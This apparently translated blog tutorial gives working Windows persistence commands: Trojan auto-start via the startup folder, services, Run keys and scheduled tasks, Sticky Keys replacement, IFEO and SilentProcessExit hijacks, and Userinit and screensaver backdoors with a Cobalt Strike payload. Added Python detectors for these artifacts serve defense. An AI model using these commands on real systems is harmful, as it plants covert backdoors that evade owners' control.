Windows persistence: auto-start, image hijacking, sticky keys, accessibility and screensaver backdoors, and WinLogon

1. Preface

  In Windows, most backdoors work the same way whether the target is a domain host or a standalone machine; the only extra question is how to get the shell back out when the host has no network access. For example, a host in the domain with no outbound access is reached in the early stage through a host that does have access. The Trojans can be set up the same way: put a bind (forward) Trojan on the non-networked host and leave it running, and put a reverse Trojan on the networked host. When we connect, we only connect to the reverse Trojan and then use it to reach the bind Trojan, and that is all there is to it.

  Of course, the above is an ideal setup; the real environment may be more complicated, so it still needs careful thought.

  This time the Windows persistence techniques are tested in a stand-alone environment. The effect in a domain is the same, except that in a domain you additionally have to consider whether the host has network access and how to get traffic out.

2. Self-starting

  Everyone knows about auto-start: after installing a lot of software you find that some of it has enabled auto-start. All this does is register the program with the system's startup mechanism so that it runs automatically the next time the computer boots.

2.1. Path loading

  Path loading means placing the Trojan file in the system's startup directory so that it is executed automatically.

2.1.1. Placing files

  Note that the systems we use are usually Chinese editions. On some systems the directory names are displayed entirely in English, on others in Chinese; the virtual machine below is the latter case.

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\    ## English
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\开始菜单\程序\启动\    ## Chinese

2.1.2. Restart the host

  After restarting the host, I found that it came online automatically, but there still seemed to be a slight problem: several black pop-up windows appeared on the host for no obvious reason. Experienced people would definitely be suspicious, but I don't know whether the problem is with my environment.

2.2. Service loading

  Service loading uses a service to come online automatically: create a service, point it at the Trojan, and set its startup type to automatic. The Trojan is then executed automatically the next time the machine boots.

2.2.1. Creating services

  Keep in mind that everything here happens after the target host has already been obtained: these steps are about maintaining access, not about obtaining access or the host in the first place.

  To create a service you need to elevate first; an ordinary (non-elevated) administrator prompt seems unable to create services. It is also best to mimic the name of a necessary program, for example for "server" you can add an "s", and so on.

sc create Muma binPath= C:\1\3000.exe start= auto    #create an auto-start service whose path runs the Trojan
sc delete Muma   #delete the service

2.2.2. View services

  As you can see, the service is bound to the Trojan. These reverse-shell Trojans are also quite small, and while running they are essentially invisible.

2.2.3. Restart the host

  The host is restarted so that the system loads the service; a newly created service does not run by itself. You could also start it manually, but since we want it to remain usable later, there is no need to rush to run the program now.

  Just wait for the target host to restart.

2.3. Registry loading

  Registry loading adds the Trojan to the registry and lets the registry load it.

2.3.1. Add startup items

  Different registry paths apply to different scopes: one for the current user and one for the whole machine. The current-user key can be written as soon as you have that user's rights; the machine-wide key requires administrator (SYSTEM-level) rights, so privilege escalation is needed first.

Current-user Run key (registry path):
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Machine-wide Run key (registry path, requires administrator rights):
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\1\3000.exe"

2.3.2. View the registry

regedit ## view the registry

2.3.3. Restart the host

  After restarting, you can see that it came online successfully.

3. Scheduled tasks

  For scheduled tasks on Windows, the at command can be used on systems older than Windows Server 2012. From Windows Server 2012 onwards the at command is no longer available and schtasks is used instead to add scheduled tasks. Note that tasks created with the at command run with SYSTEM privileges by default.

  You can search Baidu for the specific usage, so I won't give a detailed demonstration here.

3.1. Create scheduled tasks

  Create a scheduled task named TestService that runs the 3000.exe program in the 1 directory on the C drive at 09:46 every day.

Create the task: schtasks /Create /TN TestService /SC DAILY /ST 09:46 /TR c:\1\3000.exe /RL HIGHEST
Query the task: SchTasks /Query /TN TestService
Delete the task: SchTasks /Delete /TN TestService [/f]

3.2. Check the effect

  Once the scheduled time arrives the task runs, and when it runs the program comes online.
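
From the defender's side, the task created above stands out in an export of the scheduler: its binary lives outside the Windows and Program Files directories, and it sits at the top level of the task tree rather than under a vendor folder. The following is an added example, not part of the original post; it parses constructed `schtasks /Query /FO CSV /V` output (with the column set cut down to the ones it uses) and reports such tasks.

```python
import csv
import io

# Constructed sample of `schtasks /Query /FO CSV /V` output; the real output has many
# more columns, only those used here are kept. Task \TestService is the one from 3.1.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type","Start Time"
"WIN-TEST","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Weekly","1:00:00 AM"
"WIN-TEST","\TestService","c:\1\3000.exe","Administrator","Daily","9:46:00 AM"
"WIN-TEST","\Microsoft\Windows\UpdateOrchestrator\Schedule Scan","%systemroot%\system32\usoclient.exe StartScan","SYSTEM","Daily","3:00:00 AM"
'''

# Locations a scheduled task's binary is normally expected to run from.
TRUSTED_PREFIXES = ("c:\\windows\\", "%windir%\\", "%systemroot%\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")

def binary_of(task_to_run):
    """Executable part of a 'Task To Run' value (quoted or bare), lower-cased."""
    s = task_to_run.strip()
    if s.startswith('"'):
        return s[1:s.find('"', 1)].lower()
    return s.split(" ", 1)[0].lower()

def find_suspicious_tasks(csv_text):
    """Return tasks whose binary is outside trusted directories or whose name sits
    at the top level of the task tree (vendor tasks live under \\Microsoft\\...)."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["TaskName"] == "TaskName":   # schtasks /V repeats the header line
            continue
        exe = binary_of(row["Task To Run"])
        reasons = []
        if not exe.startswith(TRUSTED_PREFIXES):
            reasons.append("binary outside Windows/Program Files: " + exe)
        if row["TaskName"].count("\\") == 1:
            reasons.append("top-level task name")
        if reasons:
            findings.append({"task": row["TaskName"], "user": row["Run As User"],
                             "exe": exe, "reasons": reasons})
    return findings
```

On a real host, feed it the output of `schtasks /Query /FO CSV /V` and review every flagged task together with its "Run As User" column.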

4. Sticky keys

  Sticky Keys is the program that pops up automatically when the user presses Shift five times. It is not only Sticky Keys: there are several accessibility features, and one characteristic they share is that they can be triggered even when no user is logged in. Attackers therefore often maintain access by tampering with the programs these accessibility features point to.

  Sticky Keys location: C:\windows\system32\sethc.exe

4.1. Replacing Sticky Keys

  One catch is that replacing it requires SYSTEM privileges; an administrator cannot modify the file directly.

move sethc.exe sethc1.exe
copy cmd.exe sethc.exe

4.2. Overall idea

  The overall idea is to modify the Sticky Keys program: rename the backdoor Trojan or cmd to the Sticky Keys program's name, then press Shift five times at the logon window to invoke it.

  However, this cannot be used on newer versions of Windows.
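
A defender's check for the replacement above is a simple hash comparison: a sethc.exe that is byte-identical to cmd.exe, or a renamed original (sethc1.exe) left beside it, is exactly the artifact this method leaves behind. The example below is added here and is not from the original post; it runs against a constructed fake System32 directory in a temp folder, and the list of accessibility binaries it checks is my own assumption based on the "several accessibility features" mentioned above.

```python
import hashlib
import os
import tempfile

# Accessibility helpers reachable from the logon screen; sethc.exe is Sticky Keys.
# (List assumed for this example; the post itself only names sethc.exe.)
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe")

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def check_accessibility_binaries(system32):
    """Report accessibility binaries that are byte-identical to cmd.exe, and leftover
    renamed copies of sethc.exe (the 'move sethc.exe sethc1.exe' step leaves one)."""
    findings = []
    cmd_hash = sha256_of(os.path.join(system32, "cmd.exe"))
    for name in ACCESSIBILITY_BINARIES:
        path = os.path.join(system32, name)
        if os.path.exists(path) and sha256_of(path) == cmd_hash:
            findings.append(f"{name} is identical to cmd.exe")
    for entry in sorted(os.listdir(system32)):
        e = entry.lower()
        if e.startswith("sethc") and e.endswith(".exe") and e != "sethc.exe":
            findings.append(f"leftover copy {entry} next to sethc.exe")
    return findings

def demo():
    """Build a constructed fake System32 in a temp dir where sethc.exe was swapped
    for cmd.exe exactly as in the commands above, then run the check on it."""
    d = tempfile.mkdtemp()
    files = {"cmd.exe": b"CMD-BYTES", "sethc.exe": b"CMD-BYTES",
             "sethc1.exe": b"ORIGINAL-STICKY-KEYS", "utilman.exe": b"UTILMAN-BYTES"}
    for name, data in files.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return check_accessibility_binaries(d)
```

On a real machine, call `check_accessibility_binaries(r"C:\Windows\System32")` from an elevated prompt; a clean system returns an empty list.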

5. Image Hijacking

  Image hijacking uses the IFEO (Image File Execution Options) feature of Windows. IFEO is a legitimate feature, mainly used for debugging: its purpose is to launch a debugger when a program starts, so that the program's behaviour can be observed in the debugger in environments that are hard to reproduce.

  Put simply, the program is hijacked by modifying the registry entry for that program: when the program is run, it is actually the backdoor we left behind that runs.

  When a program is launched, the system checks this registry key. If an entry exists for the program and a Debugger value is set, the program named in Debugger is executed first (with the original program as its argument), which is what produces the image hijack.

5.1. View the registry

  Looking at the registry, you will find many exe programs listed under this key. We can modify these entries to achieve the hijack, or add an entry for an exe of our choice.

Registry location: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

5.2. Common hijacking test

  Here we hijack Notepad into the calculator. Of course, the calculator could just as well be replaced with one's own Trojan to come online.

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "c:\windows\system32\calc.exe" /reg:32

REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /f /reg:32

5.3. Hidden hijacking test

  Hidden hijacking is implemented with GlobalFlag and is triggered on normal process exit. That is, when Notepad is started the Trojan is not executed, and Notepad itself still runs normally, so nothing is noticeable; but when Notepad is closed, execution of the backdoor Trojan is triggered automatically.

5.3.1. Operation demonstration

  Let's make some changes here; read the commands yourself and adapt the contents to your own setup.

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\1\3000.exe"

5.3.2. Check the effect

  Here we open Notepad and then close it, and the target host comes online automatically.

6. Screensaver & Login

  This uses programs that are triggered when logging in after the screen is locked: the program that should keep running is simply appended after those programs.

6.1. Combined with fileless launch

  In essence, this means modifying the registry and adding the Trojan path to the corresponding value; when the logon is triggered, the Trojan is executed automatically.

6.1.1. View the registry

  The value Userinit under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon is the program that is triggered when the current user logs in. Here we append the Trojan path after this value.

6.1.2. Modify the registry

  Permissions are required here; it may not be possible with an ordinary user's rights, so you still need to escalate privileges first.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\System32\userinit.exe,C:\1\3000.exe"

6.1.3. Check the effect

  As you can see, it comes online after a restart, or after locking the screen and logging in again.

6.2. Coming online with a payload

  Here we use a payload generated in CS (Cobalt Strike) to come online.

6.2.1. Generate payload

  Select payload > payload generator, choose the listener, and set the type to powershell command.

6.2.2. Modify the registry

  Note that the payload must be made to evade antivirus, otherwise it will be killed without fail.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\System32\userinit.exe,payload"   ## Note: "payload" here stands for the payload generated by CS, pasted in; it is too long to type out.

6.2.3. View the registry

  Here we check whether the registry has been modified. Since this is a virtual machine it is not easy to take a screenshot, but you can see that the content was appended at the end.

6.2.4. Check the effect

  As you can see, the logon is triggered and it comes online successfully.

6.3. Executing the backdoor when the screensaver activates

  The screen saver can also be used to execute the backdoor once it activates. A normal computer runs its screen saver automatically after a period of inactivity; here, the moment the screen saver starts, the backdoor is executed as well.

6.3.1. View the registry

  If a screen saver is selected, the value SCRNSAVE.EXE under HKEY_CURRENT_USER\Control Panel\Desktop in the registry is the corresponding screen saver program. If this value is changed to our Trojan, the Trojan is triggered when the screen saver starts.

  But when I looked, this value did not seem to be present in my registry, which is odd, but I found that I can add it myself.

6.3.2. Modify the registry

  The modification here amounts to adding the Trojan.

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\1\3000.exe" /f

6.3.3. Check the effect

  After locking the screen, you can see that it comes online successfully.
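
All the registry-based techniques in this post (the Run keys in 2.3, the IFEO Debugger in 5.2, GlobalFlag plus SilentProcessExit in 5.3, Userinit in 6.1/6.2 and SCRNSAVE.EXE in 6.3) leave values that a defender can check offline from a `reg export` file. The following is an added example and not code from the original post: it parses a constructed .reg export containing exactly those entries and flags them. It assumes the default Userinit value of C:\Windows\system32\userinit.exe and treats only the Windows and Program Files directories as trusted binary locations.

```python
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\System32\\userinit.exe,C:\\1\\3000.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"MonitorProcess"="C:\\1\\3000.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"backdoor"="C:\\1\\3000.exe"
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
[HKEY_CURRENT_USER\Control Panel\Desktop]
"SCRNSAVE.EXE"="C:\\1\\3000.exe"
'''  # constructed sample in `reg export` format, not taken from a real host
NT = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
TRUSTED = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def parse_reg(text):  # .reg export -> {key: {value_name: data}}, REG_SZ and REG_DWORD only
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("["):
            current = keys.setdefault(line.strip("[]"), {})
        elif current is not None and line.startswith('"'):
            name, _, data = line[1:].partition('"=')
            # REG_SZ data in .reg files has doubled backslashes and \" for embedded quotes
            current[name] = (int(data[6:], 16) if data.startswith("dword:")
                             else data.strip('"').replace('\\"', '"').replace("\\\\", "\\"))
    return keys

def _exe(cmd):  # first token of a command line (quoted or bare), lower-cased
    return (cmd[1:cmd.find('"', 1)] if cmd.startswith('"') else cmd.split()[0]).lower()

def audit(keys):
    findings = []
    for key, vals in keys.items():
        if key.lower().endswith("\\currentversion\\run"):
            findings += [f"Run value {n!r} -> {_exe(c)}" for n, c in vals.items()
                         if not _exe(c).startswith(TRUSTED)]
        elif key.startswith(NT + "Image File Execution Options\\"):
            exe = key.rsplit("\\", 1)[1]
            if "Debugger" in vals: findings.append(f"IFEO Debugger on {exe}: {vals['Debugger']}")
            if vals.get("GlobalFlag", 0) & 0x200:  # FLG_MONITOR_SILENT_PROCESS_EXIT
                mon = keys.get(NT + "SilentProcessExit\\" + exe, {}).get("MonitorProcess")
                findings.append(f"SilentProcessExit monitor on {exe}: {mon}")
        elif key == NT + "Winlogon":
            if [p.lower() for p in vals.get("Userinit", "").split(",") if p] != ["c:\\windows\\system32\\userinit.exe"]:
                findings.append(f"Userinit tampered: {vals.get('Userinit')}")
        elif key.lower().endswith("\\control panel\\desktop") and "SCRNSAVE.EXE" in vals:
            if not vals["SCRNSAVE.EXE"].lower().startswith(TRUSTED):
                findings.append(f"SCRNSAVE.EXE outside Windows: {vals['SCRNSAVE.EXE']}")
    return findings
```

Against a real host, export the keys in question with `reg export`, read the file with the UTF-16 encoding reg.exe writes, and pass the text to `audit(parse_reg(text))`.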

Origin blog.csdn.net/weixin_44268918/article/details/132338391